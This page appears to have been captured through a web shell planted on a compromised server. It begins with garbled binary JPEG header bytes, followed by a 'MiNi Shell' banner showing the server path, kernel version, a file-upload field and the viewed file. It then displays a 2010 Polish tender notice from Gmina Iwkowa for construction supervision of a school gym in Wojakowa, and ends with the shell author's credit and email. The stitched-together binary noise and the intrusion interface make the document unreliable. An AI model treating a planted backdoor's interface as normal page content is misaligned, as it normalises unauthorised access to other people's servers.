JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100622/161745-N-2010.html

<p class="kh_header"><b>Iwkowa: Sprawowanie kompleksowego nadzoru inwestorskiego nad realizacją projektu pn. Budowa sali gimnastycznej wraz z zapleczem przy Zespole Szkół w Wojakowej - Etap II</b><br>
<b>Numer ogłoszenia: 161745 - 2010; data zamieszczenia: 22.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwkowa , Iwkowa 468, 32-861 Iwkowa, woj. małopolskie, tel. 014 68-44-010, 68-44-020, faks 014 6844060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iwkowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie kompleksowego nadzoru inwestorskiego nad realizacją projektu pn. Budowa sali gimnastycznej wraz z zapleczem przy Zespole Szkół w Wojakowej - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie kompleksowego  nadzoru inwestorskiego  
w zakresie następujących branż :  konstrukcyjno - budowlanej ,  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych   dla potrzeb  realizacji projektu pn.:  Budowa sali gimnastycznej wraz z zapleczem przy Zespole Szkół  w Wojakowej - EtapII. W ramach przedmiotowego projektu będzie realizowana  budowa  sali gimnastycznej o wymiarach  26,7 m x 12,31 m x 7,20 m wraz z zapleczem i kotłownią przy Zespole Szkół w Wojakowej wraz z instalacjami.  Budynek sali będzie obiektem dwukondygnacyjnym wolnostojącym, połączonym przewiązką z istniejącym budynkiem szkolnym. Sala gimnastyczna posiadać będzie osobne wejścia, umożliwiające wykorzystanie obiektu niezależnie od budynku Szkoły. Konstrukcja budynku zaprojektowana jest jako tradycyjna tj. ściany murowane, strop na części budynku żelbetowy, a na części sufitu podwieszany na dźwigarach stalowych. Więźba dachowa drewniana. W ramach projektu przewiduje się również utwardzenie powierzchni gruntu (chodniki i place)  z kostki betonowej. 

2.	Zamawiający dopuszcza możliwość wglądu do dokumentacji technicznej dla projektu wymienionego w pkt. I 1  w siedzibie Zamawiającego, pok. nr 13 (wejście B).

3.	Zakres  obowiązków i zadania inspektora nadzoru:  
1)	Realizacja praw i obowiązków wynikających z ustawy  z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz.U. z 2006 r Nr 156, poz. 1118 z póź. zm.) - art. 25, 26 i 27 odnośnie praw i obowiązków inspektora nadzoru .
2)	Obecność na terenie robót z częstotliwością uwzględniającą specyfikę realizowanych robót , jednakże nie rzadziej niż  dwa razy w tygodniu, a także na wezwanie Wykonawcy i Zamawiającego .
3)	Kontrola ilościowa i jakościowa realizowanych robót.
4)	Udział w przekazywaniu placu budowy.
5)	Udział w naradach roboczych organizowanych  przez Zamawiającego.
6)	Współdziałanie z Wykonawcą robót na placu budowy.
7)	Informowanie inwestora o zaawansowaniu rzeczowo-finansowym robót.
8)	Udział w komisjach szacowania ewentualnych szkód.
9)	Sporządzanie finansowo-rzeczowego rozliczenia końcowego realizowanego zadania.
10)	Udostępnianie dokumentów (związanych z realizowanym zadaniem)   wszystkim  Kontrolującym przedstawicielom instytucji wynikających z przepisów  Prawa Budowlanego  oraz  innych  przepisów obowiązujących w tym zakresie .
11)	Dbanie o jakość robót, tempo robót, odbiory robót w zgodności z dokumentacją projektową, specyfikacjami technicznymi .
12)	Wydawanie poleceń, decyzji, opinii, zgody  i akceptacji w formie ustnej i pisemnej, które są obowiązujące dla Wykonawcy robót oraz udzielanie Wykonawcy wszelkich wyjaśnień i wskazówek (w przypadku konieczności konsultuje się z projektantem przed udzieleniem wyjaśnień).
13)	Decydowanie o dopuszczeniu do stosowania lub odrzuceniu materiałów, prefabrykatów i wszystkich elementów  oraz urządzeń przewidzianych do realizacji robót. Żądania wykonania dodatkowych badań przez Wykonawcę robót materiałów budzących wątpliwości, co do jakości oraz akceptowania receptur i technologii zgodnie z wymaganiami Specyfikacji Technicznych . Decyzje te muszą być oparte na wymaganiach określonych w dokumentacji projektowej, specyfikacji technicznej oraz normach i przepisach związanych z realizacją robót.
14)	Dokonanie  sprawdzenia projektu budowlanego oraz Specyfikacji Technicznych Wykonania i Odbioru Robót przed rozpoczęciem robót budowlanych w zakresie sprawowanego nadzoru.  Zauważone błędy Inspektor Nadzoru wyjaśnia i uzgadnia          z projektantem.
15)	Uzgadnianie z autorem projektu możliwości wprowadzenia rozwiązań zamiennych              w stosunku do przewidzianych w projekcie (jeżeli zaistnieje taka konieczność).
16)	Ponoszenie odpowiedzialności za realizację robót zgodnie z warunkami  ustalonymi                    w  zgłoszeniu robót budowlanych  oraz uzgodnieniach opiniujących realizację inwestycji i sprawdzają realizację tych ustaleń przez wykonawcę robót budowlanych.
17)	Wstrzymywanie robót w wypadku prowadzenia ich przez Wykonawcę niezgodnie 
z umową lub przepisami BHP .
18)	Przestrzeganie prawidłowości wpisów do dziennika budowy pod względem obowiązującej chronologii i postępu prac budowlanych.
19)	Sprawdzanie jakości wykonanych robót i w razie konieczności powiadamianie Wykonawcy o wykrytych wadach oraz poświadczanie usunięcia wad przez Wykonawcę a także ustalania rodzaju i zakresu koniecznych do wykonania robót poprawkowych.
20)	Ustalanie metod obmiaru robót i uczestniczenie przy dokonywaniu obmiarów robót przez Wykonawcę .
21)	Uzgadnianie z Zamawiającym zakresu robót dodatkowych lub zamiennych                           i przygotowanie dla tych prac wniosku uzasadniającego wraz z kalkulacją kosztów.
22)	Przygotowanie opinii wraz z uzasadnieniem w przypadku spraw spornych                             z Wykonawcą oraz przedłożenie do rozstrzygnięcia Zamawiającemu.
23)	Dokonanie odbioru technicznego: gotowych elementów , robót zanikających, robót dodatkowych, ulegających zakryciu, odbioru częściowego.
24)	Potwierdzenie terminu zakończenia nadzorowanych robót, wpisem do dziennika budowy.
25)	Uczestniczenie w pracach komisji odbioru robót w tym końcowego odbioru robót, powoływanej przez Zamawiającego. 
26)	Sprawdzanie i zatwierdzanie do zapłaty kosztorysów (jeżeli takie występują)  po wykonaniu robót i faktur za wykonane roboty .
27)	Sprawdzanie  kompletności dokumentacji powykonawczej.
28)	Przygotowanie i przedłożenie Zamawiającemu sprawozdania końcowego z realizacji inwestycji w terminie do 15 dni od daty podpisania  protokołu końcowego odbioru robót .
29)	Ponoszenie odpowiedzialności za wszelkie podjęte przez siebie decyzje.  
30)	Zapewnienie we własnym zakresie w ramach wynagrodzenia umownego  zapewni :
-	transport na potrzeby własne na placu budowy,
-	niezbędny sprzęt oraz wyposażenie na potrzeby własne na terenie budowy,
-	środki łączności (telefon, internet itp.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, 
dotychczasowemu wykonawcy usług  zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień          i zamówienie uzupełniające jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy  - wg wzoru zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Zamawiający wymaga aby Wykonawca dysponował osobami posiadającymi uprawnienia budowlane do wykonania przedmiotu zamówienia tj. osobami  posiadającymi  uprawnienia budowlane uprawniające do pełnienia funkcji inspektora nadzoru budowlanego  w stosownych specjalnościach  będących członkami właściwej Izby Samorządu Zawodowego oraz posiadają min. 5 lat  doświadczenia w pełnieniu funkcji inspektora nadzoru lub kierownika budowy od momentu uzyskania uprawnień.
b)	Zamawiający dopuszcza możliwość łączenia uprawnień w zakresie poszczególnych branż przez jedną osobę.
c)	Na potwierdzenie warunków określonych w pkt. VII.2.a) SIWZ  i  pkt. VII.2.b) SIWZ Wykonawca przedłoży oświadczenia - wg wzoru zał. nr 2 do SIWZ  oraz  wg wzoru zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku dysponowania odpowiednim potencjałem 
technicznym niezbędnym do realizacji zamówienia jeżeli Wykonawca złoży oświadczenie Wykonawcy - wg wzoru  zał. nr 2 do SIWZ  .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Oświadczenie Wykonawcy  - wg wzoru zał. nr 2 do SIWZ.
b)	Zamawiający wymaga aby Wykonawca dysponował osobami posiadającymi uprawnienia budowlane do wykonania przedmiotu zamówienia tj. osobami  posiadającymi  uprawnienia budowlane uprawniające do pełnienia funkcji inspektora nadzoru budowlanego  w specjalności:
-	konstrukcyjno - budowlanej   
-	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, 
gazowych, wodociągowych i kanalizacyjnych
-	instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych

będących członkami właściwej Izby Samorządu Zawodowego oraz posiadają min. 5 lat  doświadczenia w pełnieniu funkcji inspektora nadzoru lub kierownika budowy od momentu uzyskania uprawnień.
c)	Na potwierdzenie tego warunku Wykonawca przedłoży oświadczenie , że osoby ,
które będą uczestniczyć w wykonywaniu zamówienia , posiadają wymagane uprawnienia - wg wzoru zał. nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy  - wg wzoru zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty - wg wzoru zał. Nr 1do SIWZ.
2.	Parafowany przez Wykonawcę wzór umowy -  zał. Nr 4 do  SIWZ.
3.	Pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia. 
Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy 
w sprawie zamówienia publicznego (art. 23 ust. 2 ustawy PZP).

4.	Dokumenty wymagane w przypadku składania oferty wspólnej
Oferta winna zawierać dokumenty określone w pkt.VIII.1 SIWZ, VIII.2 SIWZ, VIII.3  SIWZ  dla każdego partnera  z osobna, pozostałe dokumenty składane są wspólnie.

5.	W przypadku gdy Wykonawca zamierza powierzyć część zamówienia podwykonawcom musi 
określić dokładny zakres zamówienia powierzonego im do wykonania. 

6.  Zgodnie z art. 26 ust.2 ustawy PZP załączą dokumenty wymienione w § 1 ust. 1 
pkt  7 oraz  § 2 ust. 1 pkt 1 Rozporządzenia Prezesa Rady Ministrów z dnia  30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz.U. z  2009 roku,  Nr 226, poz. 1817 ), oraz spełnią  wymogi art. 26 ust 2a, 2b, 2c  ustawy PZP. 
7.	Dokumenty o których mowa w pkt. VIII.3  SIWZ  mają być wystawione  
w terminach określonych w §4 ust.2 rozporządzenia Prezesa Rady Ministrów 
z 30.12.2009r w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz.U.Nr 226, poz. 1817 z 2009r) .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w SIWZ oraz określił warunki takiej zmiany.

1.	Istotne postanowienia do umowy zostały określone we wzorze umowy stanowiącym załącznik  nr 4 do SIWZ.              

2.	Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy  w stosunku do treści oferty, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili  zawarcia umowy lub zmiany te są korzystne dla 
Zamawiającego.

3.	Zamawiający określa warunki wprowadzenia wymienionych zmian tj.:
a)	zmiana ceny za wykonanie zamówienia zostanie dokonana na podstawie cen wynikających z wynagrodzenia Wykonawcy/ów robót określonych w zawartych umowach na wykonanie robót określonych w pkt. I.1 SIWZ .
b)	zmiana nazwy Zamawiającego lub nazwy Wykonawcy,
c)	zmiana konta bankowego Wykonawcy, 
d)	zmiana osób reprezentujących, w przypadku zmian organizacyjnych,
e)	zmiana urzędowej stawki VAT,
f)	zmiany spowodowane szczególnymi warunkami atmosferycznymi i zdarzeniami losowymi, które utrudniają lub uniemożliwiają realizację zamówienia w umowny sposób,
g)	zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne pod warunkiem, że osoby te będą spełniały wymagania określone w ogłoszeniu 
o zamówieniu  i  SIWZ ,
h)	w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego,
i)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z  SIWZ, 
j)	zmiana wysokości całkowitego wynagrodzenia w przypadku zmiany zakresu robót,
k)	zmiana zakresu rzeczowego realizowanego zadania,
l)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy, 
m)	zmiana terminu realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iwkowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Iwkowej
32-861 Iwkowa 468.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2010 godzina 09:00, miejsce: Siedziba Zamawiającego - Urząd Gminy w Iwkowej,  32-861  Iwkowa 468,  (wejście A),  sekretariat -  pokój 
nr  5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach 
Małopolskiego  Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com